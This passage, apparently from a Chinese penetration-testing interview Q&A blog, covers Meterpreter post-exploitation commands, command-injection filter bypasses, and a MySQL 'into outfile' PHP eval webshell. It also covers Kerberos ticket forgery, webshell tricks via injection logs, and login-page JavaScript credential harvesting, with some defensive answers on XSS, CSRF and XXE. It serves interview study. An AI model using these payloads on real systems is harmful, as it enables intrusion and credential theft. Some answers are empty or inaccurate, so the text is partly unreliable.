class="line">	migrate pid 									#将Meterpreter会话移植到进程数位pid的进程中</span><br><span class="line">	execute -H -i -f cmd.exe 						#创建新进程cmd.exe，-H不可见，-i交互</span><br><span class="line">	getpid 											#获取当前进程的pid</span><br><span class="line">	kill pid 										#杀死进程</span><br><span class="line">	getuid 											#查看权限</span><br><span class="line">	sysinfo 										#查看目标机系统信息，如机器名，操作系统等</span><br><span class="line">	getsystem 										#提权操作</span><br><span class="line">	timestompc:/a.doc -c &quot;10/27/2015 14:22:11&quot; 		#修改文件的创建时间</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">迁移进程</span></span><br><span class="line">	1-meterpreter &gt; ps</span><br><span class="line">	2-自行选择PID</span><br><span class="line">	3-meterpreter &gt; migrate pid</span><br><span class="line">	</span><br><span class="line">还可以做免杀木马等等。。。。MSF 蛮强大的</span><br></pre></td></tr></table></figure>



<h2 id="27-SQL注入bypass你会那些手法"><a href="#27-SQL注入bypass你会那些手法" class="headerlink" title="27-SQL注入bypass你会那些手法"></a>27-SQL注入bypass你会那些手法</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1-等量替换</span><br><span class="line">2-参数污染HPP</span><br><span class="line">3-编码绕过</span><br><span class="line">4-SQL特性</span><br></pre></td></tr></table></figure>



<h2 id="28-文件上传怎么绕过"><a href="#28-文件上传怎么绕过" class="headerlink" title="28-文件上传怎么绕过"></a>28-文件上传怎么绕过</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="29-命令执行怎么绕过"><a href="#29-命令执行怎么绕过" class="headerlink" title="29-命令执行怎么绕过"></a>29-命令执行怎么绕过</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">cat 233.txt</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">管道符号绕过</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">空格绕过</span> </span><br><span class="line"><span class="meta prompt_">	$</span><span class="language-bash">&#123;IFS&#125;</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">%0a、%09</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">重定向绕过</span></span><br><span class="line">	&lt; &lt;&gt; </span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">变量拼接绕过</span></span><br><span class="line">	@kali:$ a=c;b=at;c=fl;d=ag;$a$b $c$d</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">单引号、双引号绕过</span></span><br><span class="line">    ca&#x27;&#x27;t flag</span><br><span class="line">	cat&quot;&quot; flag</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">编码绕过</span></span><br><span class="line"><span class="meta prompt_">	#</span><span class="language-bash">$(<span class="built_in">printf</span> <span class="string">&quot;\x63\x61\x74\x20\x2f\x66\x6c\x61\x67&quot;</span>) ==&gt;<span class="built_in">cat</span> /flag</span></span><br><span class="line"><span class="meta prompt_">	#</span><span class="language-bash">&#123;<span class="built_in">printf</span>,<span class="string">&quot;\x63\x61\x74\x20\x2f\x66\x6c\x61\x67&quot;</span>&#125;|\<span class="variable">$0</span> ==&gt;<span class="built_in">cat</span> /flag</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">	#</span><span class="language-bash">$(<span class="built_in">printf</span> <span class="string">&quot;\154\163&quot;</span>) ==&gt;<span class="built_in">ls</span></span>	</span><br><span class="line"><span class="meta prompt_">	$</span><span class="language-bash">(<span class="built_in">printf</span> <span class="string">&quot;\154\163&quot;</span>)</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">查看等价替换</span></span><br><span class="line">	(1)more:一页一页的显示档案内容</span><br><span class="line">	(2)less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页</span><br><span class="line">	(3)head:查看头几行</span><br><span class="line">	(4)tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示</span><br><span class="line">	(5)tail:查看尾几行</span><br><span class="line">	(6)nl：显示的时候，顺便输出行号</span><br><span class="line">	(7)od:以二进制的方式读取档案内容</span><br><span class="line">	(8)vi:一种编辑器，这个也可以查看</span><br><span class="line">	(9)vim:一种编辑器，这个也可以查看</span><br><span class="line">	(10)sort:可以查看</span><br><span class="line">	(11)uniq:可以查看</span><br><span class="line">	(12)file -f:报错出具体内容</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">反斜线绕过</span></span><br><span class="line">	c\at fl\ag</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">内敛注释绕过</span></span><br><span class="line"><span class="meta prompt_">	#</span><span class="language-bash">`命令`和$(命令)都是执行命令的方式</span></span><br><span class="line">	echo &quot;m0re`cat flag`&quot;</span><br><span class="line">	echo &quot;m0re $(cat flag)&quot;</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">base64</span>编码绕过</span></span><br><span class="line">	`echo &quot;Y2F0IGZsYWc=&quot;|base64 -d`</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">绕过长度限制</span></span><br><span class="line"><span class="meta prompt_">	# </span><span class="language-bash">&gt;命令会将原有文件内容覆盖</span></span><br><span class="line">	echo &#x27;123&#x27;&gt;xxoo.txt</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">&gt;&gt;符号的作用是将字符串添加到文件内容末尾，不会覆盖原内容</span></span><br><span class="line">	echo &#x27;233&#x27;&gt;&gt;xxoo.txt</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">命令换行绕过</span></span><br><span class="line">	ca\</span><br><span class="line">	a\</span><br><span class="line">	t\</span><br><span class="line">	fl\</span><br><span class="line"> 	ag</span><br></pre></td></tr></table></figure>



<h2 id="30-了解域渗透吗？说说域渗透"><a href="#30-了解域渗透吗？说说域渗透" class="headerlink" title="30-了解域渗透吗？说说域渗透"></a>30-了解域渗透吗？说说域渗透</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1-制作白银票据</span><br><span class="line">2-制作黄金票据</span><br><span class="line"></span><br><span class="line">二者区别：黄金票据只有30分钟，白银票据是永久</span><br><span class="line">当然了，域渗透肯定不止那么点内容，东西还是很多的。下次更新了会把更新好的终极版发给大家</span><br></pre></td></tr></table></figure>



<h2 id="31-php反序列化"><a href="#31-php反序列化" class="headerlink" title="31-php反序列化"></a>31-php反序列化</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">其实我觉得按照传统的概念去回答真的不好。如果谁有比较好的回答，请发给我</span><br></pre></td></tr></table></figure>



<h2 id="32-说说java"><a href="#32-说说java" class="headerlink" title="32-说说java"></a>32-说说java</h2><h2 id="33-用python写过工具吗？"><a href="#33-用python写过工具吗？" class="headerlink" title="33-用python写过工具吗？"></a>33-用python写过工具吗？</h2><h2 id="34-python用过那些框架？"><a href="#34-python用过那些框架？" class="headerlink" title="34-python用过那些框架？"></a>34-python用过那些框架？</h2><h2 id="35-做过那些项目？"><a href="#35-做过那些项目？" class="headerlink" title="35-做过那些项目？"></a>35-做过那些项目？</h2><h2 id="36-说一下渗透流程"><a href="#36-说一下渗透流程" class="headerlink" title="36-说一下渗透流程"></a>36-说一下渗透流程</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1-信息收集</span><br><span class="line">2-发现漏洞</span><br><span class="line">3-验证漏洞-利用漏洞</span><br><span class="line">4-写渗透测试报告</span><br></pre></td></tr></table></figure>



<h2 id="37-你怎么做信息收集"><a href="#37-你怎么做信息收集" class="headerlink" title="37-你怎么做信息收集"></a>37-你怎么做信息收集</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">收集域名信息 </span><br><span class="line">Whois查询 </span><br><span class="line">备案信息查询 </span><br><span class="line">敏感信息 </span><br><span class="line">子域名信息 </span><br><span class="line">收集常用端口信息 </span><br><span class="line">指纹识别 </span><br><span class="line">查找真实IP </span><br><span class="line">敏感目录文件 </span><br></pre></td></tr></table></figure>



<h2 id="38-有CNVD证书吗？"><a href="#38-有CNVD证书吗？" class="headerlink" title="38-有CNVD证书吗？"></a>38-有CNVD证书吗？</h2><h2 id="39-打过CTF吗？有排名吗？"><a href="#39-打过CTF吗？有排名吗？" class="headerlink" title="39-打过CTF吗？有排名吗？"></a>39-打过CTF吗？有排名吗？</h2><h2 id="40-平时在哪里挖漏洞？都挖那些漏洞？挖了多久？主要挖那些类型的漏洞？有排名吗？"><a href="#40-平时在哪里挖漏洞？都挖那些漏洞？挖了多久？主要挖那些类型的漏洞？有排名吗？" class="headerlink" title="40-平时在哪里挖漏洞？都挖那些漏洞？挖了多久？主要挖那些类型的漏洞？有排名吗？"></a>40-平时在哪里挖漏洞？都挖那些漏洞？挖了多久？主要挖那些类型的漏洞？有排名吗？</h2><h2 id="41-了解那些端口？"><a href="#41-了解那些端口？" class="headerlink" title="41-了解那些端口？"></a>41-了解那些端口？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">web网站</span></span><br><span class="line">	80 web</span><br><span class="line">	80-89 web</span><br><span class="line">	8000-9090 web</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">数据库</span></span><br><span class="line">	1433 MSSQL</span><br><span class="line">	1521 Oracle</span><br><span class="line">	3306 MySQL</span><br><span class="line">	5432 PostgreSQL</span><br><span class="line">	50000 DB2</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">特殊服务类</span></span><br><span class="line">	443 SSL心脏滴血</span><br><span class="line">	445 ms08067/ms11058/ms17010等</span><br><span class="line">	873 Rsync未授权</span><br><span class="line">	5984 CouchDB http://xxx:5984/_utils/</span><br><span class="line">	6379 redis未授权</span><br><span class="line">	7001,7002 WebLogic默认弱口令，反序列</span><br><span class="line">	9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞</span><br><span class="line">	11211 memcache未授权访问</span><br><span class="line">	27017,27018 Mongodb未授权访问</span><br><span class="line">	50000 SAP命令执行</span><br><span class="line">	50070,50030 hadoop默认端口未授权访问</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">常用端口类</span></span><br><span class="line">	21 ftp</span><br><span class="line">	22 SSH</span><br><span class="line">	23 Telnet</span><br><span class="line">	445 SMB弱口令扫描</span><br><span class="line">	2601,2604 zebra路由，默认密码zebra</span><br><span class="line">	3389 远程桌面</span><br></pre></td></tr></table></figure>



<h2 id="42-某某端口是什么意思？"><a href="#42-某某端口是什么意思？" class="headerlink" title="42-某某端口是什么意思？"></a>42-某某端口是什么意思？</h2><h2 id="43-如何手工快速判断目标站是windows还是linux服务器？"><a href="#43-如何手工快速判断目标站是windows还是linux服务器？" class="headerlink" title="43- 如何手工快速判断目标站是windows还是linux服务器？"></a>43- 如何手工快速判断目标站是windows还是linux服务器？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">linux大小写敏感,windows大小写不敏感。</span></span><br></pre></td></tr></table></figure>



<h2 id="44-为何一个mysql数据库的站，只有一个80端口开放？"><a href="#44-为何一个mysql数据库的站，只有一个80端口开放？" class="headerlink" title="44- 为何一个mysql数据库的站，只有一个80端口开放？"></a>44- 为何一个mysql数据库的站，只有一个80端口开放？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">  更改了端口</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">	站库分离</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">	3306端口不对外开放</span></span><br></pre></td></tr></table></figure>



<h2 id="45-3389无法连接的几种情况"><a href="#45-3389无法连接的几种情况" class="headerlink" title="45- 3389无法连接的几种情况"></a>45- 3389无法连接的几种情况</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">没开放3389 端口</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">端口被修改</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">防护拦截</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">处于内网(需进行端口转发)</span></span><br></pre></td></tr></table></figure>

<h2 id="46-MySQL-怎么写shell"><a href="#46-MySQL-怎么写shell" class="headerlink" title="46-MySQL 怎么写shell"></a>46-MySQL 怎么写shell</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select &#x27;一句话&#x27; into outfile &#x27;路径&#x27;</span><br><span class="line">select &#x27;一句话&#x27; into dumpfile &#x27;路径&#x27;</span><br><span class="line">select &#x27;&lt;?php eval($_POST[1]) ?&gt;&#x27; into dumpfile &#x27;路劲.muma.php&#x27;;</span><br></pre></td></tr></table></figure>



<h2 id="47-MySQL-写shell有那几个必要的条件？都是那些"><a href="#47-MySQL-写shell有那几个必要的条件？都是那些" class="headerlink" title="47-MySQL 写shell有那几个必要的条件？都是那些"></a>47-MySQL 写shell有那几个必要的条件？都是那些</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">写shell必要的有3个条件</span></span><br><span class="line">	1-必须是root权限</span><br><span class="line">	2-知道网站的绝对路径</span><br><span class="line">	3-my.ini的配置文件中secure_file_priv函数配置必须为空</span><br></pre></td></tr></table></figure>



<h2 id="48-了解编辑器漏洞吗？"><a href="#48-了解编辑器漏洞吗？" class="headerlink" title="48-了解编辑器漏洞吗？"></a>48-了解编辑器漏洞吗？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">其实还是文件上传漏洞</span></span><br><span class="line">	1- 	FCKeditor编辑器</span><br><span class="line">	2-	EWEbeditor编辑器</span><br><span class="line">	3-	DotNetTextBox编辑器</span><br><span class="line">	4-	Kedit编辑器</span><br><span class="line">	5-	Cute Editor 在线编辑器</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">这个问题基本回答个两三个就可以</span></span><br></pre></td></tr></table></figure>



<h2 id="49-access-扫出后缀为asp的数据库文件，访问乱码，如何实现到本地利用？"><a href="#49-access-扫出后缀为asp的数据库文件，访问乱码，如何实现到本地利用？" class="headerlink" title="49- access 扫出后缀为asp的数据库文件，访问乱码，如何实现到本地利用？"></a>49- access 扫出后缀为asp的数据库文件，访问乱码，如何实现到本地利用？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">迅雷下载，直接改后缀为.mdb。</span></span><br></pre></td></tr></table></figure>

<h2 id="50-提权时选择可读写目录，为何尽量不用带空格的目录？"><a href="#50-提权时选择可读写目录，为何尽量不用带空格的目录？" class="headerlink" title="50- 提权时选择可读写目录，为何尽量不用带空格的目录？"></a>50- 提权时选择可读写目录，为何尽量不用带空格的目录？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">因为exp执行多半需要空格界定参数</span></span><br></pre></td></tr></table></figure>

<h2 id="51-注入时可以不使用and-或or-或xor，直接order-by-开始注入吗？-为什么？"><a href="#51-注入时可以不使用and-或or-或xor，直接order-by-开始注入吗？-为什么？" class="headerlink" title="51- 注入时可以不使用and 或or 或xor，直接order by 开始注入吗？ 为什么？"></a>51- 注入时可以不使用and 或or 或xor，直接order by 开始注入吗？ 为什么？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">and/or/xor，前面的1=1、1=2步骤只是为了判断是否为注入点，如果已经确定是注入点那就可以省那步骤去。</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="52-某个防注入系统，在注入时会提示"><a href="#52-某个防注入系统，在注入时会提示" class="headerlink" title="52-某个防注入系统，在注入时会提示"></a>52-某个防注入系统，在注入时会提示</h2><p>​	系统检测到你有非法注入的行为。<br>​			已记录您的ip xx.xx.xx.xx<br>​			时间:2016:01-23<br>​			提交页面:test.asp?id&#x3D;15<br>​			提交内容:and 1&#x3D;1</p>
<p> 如何利用这个防注入系统拿shell？ </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">在URL里面直接提交一句话，这样网站就把你的一句话也记录进数据库文件了 这个时候可以尝试寻找网站的配置文件 直接上菜刀链接</span></span><br></pre></td></tr></table></figure>

<h2 id="53-上传大马后访问乱码时，有哪些解决办法？"><a href="#53-上传大马后访问乱码时，有哪些解决办法？" class="headerlink" title="53- 上传大马后访问乱码时，有哪些解决办法？"></a>53- 上传大马后访问乱码时，有哪些解决办法？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">浏览器中改编码。</span></span><br></pre></td></tr></table></figure>

<h2 id="54-目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？"><a href="#54-目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？" class="headerlink" title="54- 目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？"></a>54- 目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">先爆破用户名，再利用被爆破出来的用户名爆破密码。</span></span><br><span class="line"><span class="meta prompt_"> </span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">其实有些站点，在登陆处也会这样提示</span></span><br><span class="line"><span class="meta prompt_"> </span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">所有和数据库有交互的地方都有可能有注入。</span></span><br></pre></td></tr></table></figure>

<h2 id="55-在有shell的情况下，如何使用xss实现对目标站的长久控制？"><a href="#55-在有shell的情况下，如何使用xss实现对目标站的长久控制？" class="headerlink" title="55- 在有shell的情况下，如何使用xss实现对目标站的长久控制？"></a>55- 在有shell的情况下，如何使用xss实现对目标站的长久控制？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">后台登录处加一段记录登录账号密码的js，并且判断是否登录成功，如果登录成功，就把账号密码记录到一个	  生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)。</span></span><br><span class="line"><span class="meta prompt_"> </span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">在登录后才可以访问的文件中插入XSS脚本。</span></span><br></pre></td></tr></table></figure>

<h2 id="56-后台修改管理员密码处，原密码显示为-。你觉得该怎样实现读出这个用户的密码？"><a href="#56-后台修改管理员密码处，原密码显示为-。你觉得该怎样实现读出这个用户的密码？" class="headerlink" title="56- 后台修改管理员密码处，原密码显示为*。你觉得该怎样实现读出这个用户的密码？"></a>56- 后台修改管理员密码处，原密码显示为*。你觉得该怎样实现读出这个用户的密码？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">审查元素 把密码处的password属性改成text就明文显示了</span></span><br></pre></td></tr></table></figure>

<h2 id="57-以下链接存在-sql-注入漏洞，对于这个变形注入，你有什么思路？"><a href="#57-以下链接存在-sql-注入漏洞，对于这个变形注入，你有什么思路？" class="headerlink" title="57- 以下链接存在 sql 注入漏洞，对于这个变形注入，你有什么思路？"></a>57- 以下链接存在 sql 注入漏洞，对于这个变形注入，你有什么思路？</h2><p> indext.php?id&#x3D;AjAxNg&#x3D;&#x3D; </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">DATA有可能经过了 <span class="built_in">base64</span> 编码再传入服务器，所以我们也要对参数进行 <span class="built_in">base64</span> 编码才能正确完成测试</span></span><br></pre></td></tr></table></figure>

<h2 id="58-SQLserver有几种提权方式？怎么提权？"><a href="#58-SQLserver有几种提权方式？怎么提权？" class="headerlink" title="58-SQLserver有几种提权方式？怎么提权？"></a>58-SQLserver有几种提权方式？怎么提权？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">有三种提权方式</span></span><br><span class="line">咦，这个好像前面写过了，这里就不写了</span><br></pre></td></tr></table></figure>



<h2 id="59-CSRF-和-XSS-和-XXE-有什么区别，以及修复方式？"><a href="#59-CSRF-和-XSS-和-XXE-有什么区别，以及修复方式？" class="headerlink" title="59- CSRF 和 XSS 和 XXE 有什么区别，以及修复方式？"></a>59- CSRF 和 XSS 和 XXE 有什么区别，以及修复方式？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">XSS是跨站脚本攻击，用户提交的数据中可以构造代码来执行，从而实现窃取用户信息等攻击。</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">修复方式：对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">CSRF是跨站请求伪造攻击，XSS是实现CSRF的诸多手段中的一种，是由于没有在关键操作执行时进行是否由用户自愿发起的确认。</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">修复方式：筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">XXE是XML外部实体注入攻击，XML中可以通过调用实体来请求本地或者远程内容，和远程文件保护类似，会引发相关安全问题，例如敏感文件读取。</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">修复方式：XML解析库在调用时严格禁止对外部实体的解析。</span></span><br></pre></td></tr></table></figure>

<h2 id="60-CSRF、SSRF和重放攻击有什么区别？"><a href="#60-CSRF、SSRF和重放攻击有什么区别？" class="headerlink" title="60- CSRF、SSRF和重放攻击有什么区别？"></a>60- CSRF、SSRF和重放攻击有什么区别？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">CSRF是跨站请求伪造攻击，由客户端发起</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">SSRF是服务器端请求伪造，由服务器发起</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">重放攻击是将截获的数据包进行重放，达到身份认证等目的</span></span><br></pre></td></tr></table></figure>

<h2 id="61-说出至少三种业务逻辑漏洞，以及修复方式？"><a href="#61-说出至少三种业务逻辑漏洞，以及修复方式？" class="headerlink" title="61- 说出至少三种业务逻辑漏洞，以及修复方式？"></a>61- 说出至少三种业务逻辑漏洞，以及修复方式？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">密码找回漏洞中存在</span></span><br><span class="line"></span><br><span class="line">	1）密码允许暴力破解、</span><br><span class="line"></span><br><span class="line">	2）存在通用型找回凭证、</span><br><span class="line"></span><br><span class="line">	3）可以跳过验证步骤、</span><br><span class="line"></span><br><span class="line">	4）找回凭证可以拦包获取</span><br><span class="line">	</span><br><span class="line">	5）前端返回</span><br><span class="line">等方式来通过厂商提供的密码找回功能来得到密码。</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">身份认证漏洞中最常见的是</span></span><br><span class="line">	1）会话固定攻击</span><br><span class="line"></span><br><span class="line">	2） Cookie 仿冒</span><br><span class="line">只要得到 Session 或 Cookie 即可伪造用户身份。</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">验证码漏洞中存在</span></span><br><span class="line">	1）验证码允许暴力破解</span><br><span class="line"></span><br><span class="line">	2）验证码可以通过 Javascript 或者改包的方法来进行绕过</span><br><span class="line">	</span><br><span class="line">	3）空值绕过</span><br><span class="line">	</span><br><span class="line">	4）验证码的值可控</span><br></pre></td></tr></table></figure>

<h2 id="62-如何防止CSRF"><a href="#62-如何防止CSRF" class="headerlink" title="62- 如何防止CSRF?"></a>62- 如何防止CSRF?</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">1、验证referer</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">2、添加token</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">3、关键地方验证码验证</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">4、尤其是修改密码，要验证旧密码</span></span><br></pre></td></tr></table></figure>

